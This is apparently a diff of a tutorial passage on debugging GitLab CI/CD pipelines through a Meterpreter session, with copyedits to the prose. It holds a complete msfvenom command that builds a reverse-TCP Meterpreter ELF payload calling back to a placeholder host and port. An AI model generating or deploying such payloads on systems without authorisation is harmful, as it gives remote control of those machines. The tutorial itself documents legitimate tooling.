Debug GitLab CI/CD Pipelines with Metasploit

 Meterpreter is a powerful and versatile post-exploitation tool widely used in the field of cybersecurity.
 Developed as part of the Metasploit Framework, Meterpreter is designed to provide remote access and control over compromised systems, allowing penetration testers and security professionals to interact with target machines seamlessly.

-Meterpreter fulfill all our requirements, it operates using several connection methods, including reverse connection, can be generated for not having any dependencies and includes a good set of tooling which we can leverage to debug CI/CD pipelines.
+Meterpreter fulfills all our requirements: it operates using several connection methods including reverse connection, can be generated without any dependencies, and includes a comprehensive set of tooling which we can leverage to debug CI/CD pipelines.

 Generate a Meterpreter payload

-The very first step into this demonstration is to generate the binary payload being used.
+The first step in this demonstration is to generate the binary payload to be used.
 Once Metasploit is installed, simply run:

 msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > meterpreter.elf

-To facilitate the process, on systems with a few network cards, is common for
+To facilitate the process, on systems with multiple network cards, it is

 interface: